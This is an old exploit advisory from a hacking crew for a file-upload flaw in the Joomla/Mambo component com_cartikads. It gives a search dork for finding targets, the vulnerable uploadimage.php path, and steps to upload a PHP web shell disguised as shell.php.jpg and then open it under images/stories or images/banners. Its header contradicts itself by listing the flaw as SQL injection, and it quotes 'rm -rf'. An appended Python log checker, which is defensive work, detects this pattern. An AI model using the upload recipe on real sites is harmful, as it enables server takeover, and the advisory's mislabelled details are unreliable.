###################################################################################
# [~] Joomla components com_cartikads Remote File Upload vulnerability
# [~] Author   : kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage : http://www.indonesiancoder.com
# [~] Date     : January 02, 2009
#
###################################################################################

[ Software Information ]

[+] Vendor        : http://www.cartikahosting.com
[+] Download      : -
[+] version       : 1.0
[+] Vulnerability : SQL injection
[+] Dork          : "Think iT"
[+] Price         : dunno
[+] Location      : INDONESIA - JOGJA
[+] description   : Cartikads is a Mambo Open Source ads management component.

##################################################################################

[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php

[ NOTE ]

upload with extension shell.php.jpg

your shell will be

http://server/[kaMtiEz]/images/stories/shell.php.jpg
http://server/[kaMtiEz]/images/banners/shell.php.jpg

===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] My mom and dad .. and not forgetting my little sibling ..
[+] tukulesto : where did u go ??
[+] Listen to the radio at http://antisecradio.fm :D

[ QUOTE ]

[+] rm -rf

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM
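
Added example (not part of the original advisory or the component's code): a defender-side access-log check for the pattern in the note above, flagging POSTs to uploadimage.php and requests for names such as shell.php.jpg under images/stories or images/banners. The SCRIPT_EXTS list, the function names and the sample log lines are constructed assumptions.

```python
import re

# Script extensions that should never appear anywhere in an uploaded image name
# (assumed list; extend it to match the handlers your web server maps to PHP).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Upload handler and target directories named in the advisory.
UPLOAD_HANDLER = "/components/com_cartikads/uploadimage.php"
UPLOAD_DIRS = ("/images/stories/", "/images/banners/")

# Request part of a combined-format access log line: "METHOD /path HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def has_embedded_script_ext(filename):
    """True if any dot-separated part after the base name is a script extension."""
    parts = filename.lower().split(".")[1:]
    return any(p in SCRIPT_EXTS for p in parts)


def review_access_log(lines):
    """Return (line_number, reason) for requests matching the advisory's pattern."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]  # drop the query string
        name = path.rsplit("/", 1)[-1]
        if m.group("method") == "POST" and path.endswith(UPLOAD_HANDLER):
            findings.append((n, "POST to upload handler"))
        elif any(d in path for d in UPLOAD_DIRS) and has_embedded_script_ext(name):
            findings.append((n, "script extension inside image name"))
    return findings


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jan/2010:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [02/Jan/2010:10:01:12 +0000] "POST /site/components/com_cartikads/uploadimage.php HTTP/1.1" 200 312',
    '192.0.2.44 - - [02/Jan/2010:10:01:30 +0000] "GET /site/images/stories/shell.php.jpg?x=1 HTTP/1.1" 200 87',
    '192.0.2.10 - - [02/Jan/2010:10:02:00 +0000] "GET /site/images/banners/logo.jpg HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for n, reason in review_access_log(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

The same has_embedded_script_ext check can be applied to the file names already present in the two image directories, or used server-side to reject such names at upload time.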